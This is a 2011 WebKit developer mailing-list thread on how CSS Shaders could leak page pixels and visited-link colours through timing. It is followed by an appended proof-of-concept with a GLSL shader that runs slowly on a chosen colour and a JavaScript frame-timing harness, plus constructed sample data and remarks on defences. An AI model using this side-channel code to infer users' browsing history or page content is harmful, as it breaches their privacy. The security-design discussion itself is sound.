[webkit-dev] Timing attacks on CSS Shaders (was Re:Security problems with CSS shaders)

Vincent Hardy vhardy at adobe.com
Wed Dec 7 19:23:18 PST 2011


Hello,

@chris

>> So I take back my statement that CSS Shaders are less dangerous than WebGL. They are more!!!

It seems to me that the differences are:

a. It is easier to do the timing portion of a timing attack in WebGL because it all happens in a script and the timing is precise. With CSS shaders, the timing is pretty coarse.

b. The content that a CSS shader has access to may be more sensitive than the content a WebGL shader has access to because currently, WebGL cannot render HTML (but isn't it possible to render an SVG with a foreignObject containing HTML into a 2D canvas, and then use that as a texture? In that case, wouldn't the risk be the same? Or is the canvas tainted in that case and cannot be used as a texture?).

@charles

>> Can this proposal be moved forward on CORS + HTMLMediaElement, HTMLImageElement and HTMLCanvasElement?

At the last FX meeting, I got an action to sync up with the CORS group and discuss how CORS would apply to CSS shaders.

Cheers,
Vincent

Date: Mon, 05 Dec 2011 15:59:14 -0800
From: Charles Pritchard <chuck at jumis.com>
To: Chris Marrin <cmarrin at apple.com>
Cc: Jonas Sicking <jonas at sicking.cc>, webkit-dev at lists.webkit.org
Subject: Re: [webkit-dev] Timing attacks on CSS Shaders (was Re: Security problems with CSS shaders)
Message-ID: <4EDD5AD2.4010901 at jumis.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

On 12/5/11 3:34 PM, Chris Marrin wrote:
> On Dec 5, 2011, at 11:32 AM, Adam Barth wrote:
>
>> On Mon, Dec 5, 2011 at 10:53 AM, Chris Marrin <cmarrin at apple.com> wrote:
>>> To be clear, it's not the difference between white and black pixels, it's
>>> the difference between pixels with transparency and those without.
>>
>> Can you explain why the attack is limited to distinguishing between
>> black and transparent pixels?  My understanding is that these attacks
>> are capable of distinguishing arbitrary pixel values.
>
> This is my misunderstanding. I was referring to the attacks using WebGL, which measure the difference between rendering alpha and non-alpha pixels. But I think there is another, more dangerous attack vector specific to CSS shaders. Shaders have the source image (the image of that part of the page) available. So it is an easy thing to make a certain color pixel take a lot longer to render (your "1000x slower" case). So you can easily and quickly detect, for instance, the color of a link.

Can this proposal be moved forward on CORS + HTMLMediaElement,
HTMLImageElement and HTMLCanvasElement?

The proposal would really benefit users and authors on those media
types, even if it falls short of applying to general HTML elements and
CSS urls in the first draft.

I realize that it falls short of the lofty goals of the presentation,
but it would make a good impact and set the stage for further work. It
seems entirely do-able to disable a:visited on elements that have custom
filters applied, but, like the timing issues, there needs to be some
empirical data on risks before moving forward on them.

> So I take back my statement that CSS Shaders are less dangerous than WebGL. They are more!!! As I've said many times (with many more expletives), I hate the Internet.
>
> I think the solution is clear. We should create a whole new internet where we only let in people we trust.  :-)
>
> -----
> ~Chris
> cmarrin at apple.com

I still love my iPhone. ;-)


-Charles
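The attack Chris describes above has two halves: a shader whose per-pixel cost depends on the colour of the element pixel it is filtering, and a script that measures how long frames take while that shader is applied. The sketch below is an added example written for this page; it is not code from the thread, from WebKit, or from the Adobe CSS Shaders proposal. The uniform and varying names (u_texture, v_texCoord, u_target), the filter: custom(url(...)) syntax, and the way u_target would be supplied are assumptions about the 2011-era proposal, not verified API. The frame intervals at the bottom are constructed sample data so the decision logic can be exercised offline; the measurement functions themselves only run in a browser.

```javascript
// Added example, not code from the thread or from any CSS Shaders implementation.
// Assumed names: u_texture (the element's own rendered pixels), v_texCoord,
// u_target (the colour being probed for, e.g. the a:visited colour), and the
// 2011-era "filter: custom(url(...))" syntax.

// Shader half: pixels whose colour is near u_target run an expensive loop,
// every other pixel is passed through at normal cost. The data-dependent
// branch is the whole side channel.
const SLOW_ON_COLOR_SHADER = `
precision mediump float;
uniform sampler2D u_texture;   // assumed: the filtered element's rendered content
uniform vec3 u_target;         // assumed: colour to probe for
varying vec2 v_texCoord;

void main() {
  vec4 c = texture2D(u_texture, v_texCoord);
  if (distance(c.rgb, u_target) < 0.05) {
    float acc = 0.0;
    for (int i = 0; i < 4000; i++) {
      acc += sin(float(i) * c.r);
    }
    c.a += acc * 1e-9;   // negligible change; keeps the loop from being optimised out
  }
  gl_FragColor = c;
}`;

// Timing half. requestAnimationFrame timestamps are coarse (vsync granularity)
// and noisy, so compare medians of several frames rather than one sample.
function median(values) {
  const s = values.slice().sort((a, b) => a - b);
  const mid = s.length >> 1;
  return s.length % 2 ? s[mid] : (s[mid - 1] + s[mid]) / 2;
}

function frameDeltas(timestamps) {
  const out = [];
  for (let i = 1; i < timestamps.length; i++) out.push(timestamps[i] - timestamps[i - 1]);
  return out;
}

// A hit is a filtered run at least `slowdown` times slower than the unfiltered baseline.
function looksLikeTarget(baselineMs, filteredMs, slowdown = 3) {
  return median(filteredMs) > slowdown * median(baselineMs);
}

// Browser only: collect n frame intervals.
function measureFrames(n) {
  return new Promise((resolve) => {
    const ts = [];
    const tick = (t) => {
      ts.push(t);
      if (ts.length <= n) requestAnimationFrame(tick);
      else resolve(frameDeltas(ts));
    };
    requestAnimationFrame(tick);
  });
}

// Browser only: probe one element. shaderUrl is assumed to serve SLOW_ON_COLOR_SHADER.
async function probeElement(element, shaderUrl) {
  const baseline = await measureFrames(20);
  element.style.filter = `custom(url(${shaderUrl}))`;  // assumed 2011 syntax
  const filtered = await measureFrames(20);
  element.style.filter = '';
  return looksLikeTarget(baseline, filtered);
}

// Constructed sample frame intervals in ms (not measured data): a ~60 Hz baseline
// with one dropped frame, a filtered run where most frames stall because the
// probed pixels matched u_target, and a filtered run where they did not.
const SAMPLE_BASELINE_MS = [16.7, 16.6, 16.8, 33.4, 16.7, 16.7];
const SAMPLE_HIT_MS      = [205.1, 198.4, 16.7, 210.0, 201.3, 199.8];
const SAMPLE_MISS_MS     = [16.7, 16.7, 33.3, 16.6, 16.8, 16.7];
```

The median comparison is what makes the "pretty coarse" timing Vincent mentions usable: a single frame can be dropped for unrelated reasons, but a sustained 1000x per-pixel stall shows up as a shift in the typical frame interval. Note that nothing in the shader reads the pixel value out directly; the only thing that leaks is how long the frame took, which is why the defences raised in the thread (CORS-gating what a shader may sample, or not applying :visited styling under custom filters) aim at what the shader can see rather than at what it can output.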